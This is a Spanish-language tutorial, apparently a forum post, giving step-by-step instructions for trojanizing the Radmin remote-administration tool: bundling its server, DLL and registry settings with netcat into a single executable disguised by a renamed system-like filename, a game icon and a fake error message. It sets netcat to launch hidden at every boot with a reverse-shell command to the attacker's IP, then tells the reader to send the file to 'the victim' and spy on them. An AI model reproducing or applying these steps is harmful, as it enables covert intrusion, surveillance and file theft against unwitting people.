Tutorial troyanizando radmin segunda parte...en esta ocacion vamos a hacer de radmin un solo ejecutable, que con solo un doble clic se instale con toda nuestra configuracion
1.- Lo primero que haremos sera bajarnos una herramienta muy util que nos permitira empaquetar todos nuestros archivos. la pueden descargar de esta direccion
http://www.ifrance.com/IsAhT/joiner/IPacker%20Tool.zip2.- una ves que lo bajemos lo descomprimimos y ejecutamos
IPacker Tool.exe ahora nos disponemos a agregar nuestros archivos.
3.- escojemos la opcion
agregar, y despues en
ejecutable eso nos va enviar a un panel donde podemos poner el archivo que queremos agregar, seleccionamos en el icono de la carpeta y escojemos al servidor de radmin, en mi caso se llama wuaudt.exe ya con otro icono para camuflagearlo.
ahora vamos a indicarle donde se debe extraer el archivo, para eso damos click sobre la flecha que apunta a la izquierda y escojemos
%Systemdir%, en mi caso quedo asi: %Systemdir%\wuaudt.exe y le marcamos como archivo del sistema
nota: no escojan la opcion de que se ejecute al extraer, recuerden que si se ejecuta no va servir porque aun no tiene su dll copiada ni sus entradas en el registro. bueno ya que esta todo le damos en
aceptar4.- escojemos la opcion
agregar y en
active x (ocx) extensión de la app. (dll), ahora escojemos la dll de radmin
AdmDll.dll y le indicamos que se copien en
%Systemdir%, seleccionan la opcion registrar y de archivo del sistema, por ultimo
aceptar5.-escojemos la opcion
agregar y en
comandos, haí vamos a cargar la configuracion del radmin, recuerdan el bat que hicimos en la primera parte? bien pues lo vamos a volver a usar, para eso damos clic en el icono del bat y abrimos el bat que habiamos hecho, automaticamente se van a cargargar todas las entradas, y le damos en
aceptar6.-denuevo escojemos la opcion
agregar luego
comando y vamos a agregar la siguiente linea
radmin.exe /pass:xxxxxxxx /port:xxxx
en mi caso queda asi:
wuaudt.exe /pass:xxxxxxxx /port:1719
le damos en
agregar y por ultimo
aceptar7.-pues esto ya casi queda, pero le vamos a agregar una cosa mas,
netcat, si, debido a que radmin es de conexion directa, vamos a tener problemas con la ip ademas si es red, ya sben el cuete de los routers, entonces pasandole el netcat podemos ejecutar una reverse shell, para eso nos vamos a
agregar luego a
ejecutable, en archivo le cargamos el netcat, y le indicamos que se copie a
%Systemdir%, de preferencia ponganle otro nombre menos llamativo, mas de dos si sabran que es nc.exe, yo le puse al mio aviax.exe, seleccionen la opcion
ejecutar tras extraer y
ejecutar oculto, luego seleccionamos la opcion
iniciar en cada inicio, y selecionen donde queren poner la entrada en el registro, yo la puse en HKLM y de nombre le puse aviax, en parametros le ponemos los de la reverse shell
-d -e cmd.exe xxx.xxx.xxx.xxx 1717
, y seleccionamos la opcion de archivo del
sistema, por ultimo aceptar.
8.-ya acabamos ufff, ya solo falta agregarle un ultimo detalle para despistar, nos vamos a
agregar, luego a
mensajes emergentes y le ponemos un mensaje error yo le puse:
titulo : Error
mensaje: Error de lectura aplicación win32 no valida
y
aceptarahora nos dirigimos a
opciones, luego
cargar icono, y le ponemos el icono de un juegito o un programa
haí mismo tienen la opcion de salvar la configuracion, para tener lo que hicimos de respaldo, y si quieren le marcan la casilla para que se borre automaticamente una ves que sea ejecutado, luego
aceptar9.- por ultimo le damos en
generar, y ya tenemos nuestro radmin con su configuracion y ademas netcat que con el inicio del sistema nos dara una reverse shell, ya saben si tienen ip dinamica se ponen un dominio que redireccione a su ip
www.no-ip.com10.-ahora solo abren netcat, lo ponen en escucha
-L -p 1717 -vv, le mandan el radmin a la victima, y cuando lo ejecute les dara la shell ya despues abren el cliente de radmin, se conectan a la ip que les de el netcat y a espiar!! y bajarle archivos
yo hice un removedor con la misma herramienta solo selecionen que finalice el proceso del radmin y netcat, por si se estan ejecutando y despues que borre los archivos y llaves en el registro. y ya tienen radmin troyanizado, junto con su removedor incluido
saludos y suerte con las pruevas
Tutorial escrito por: OCTALH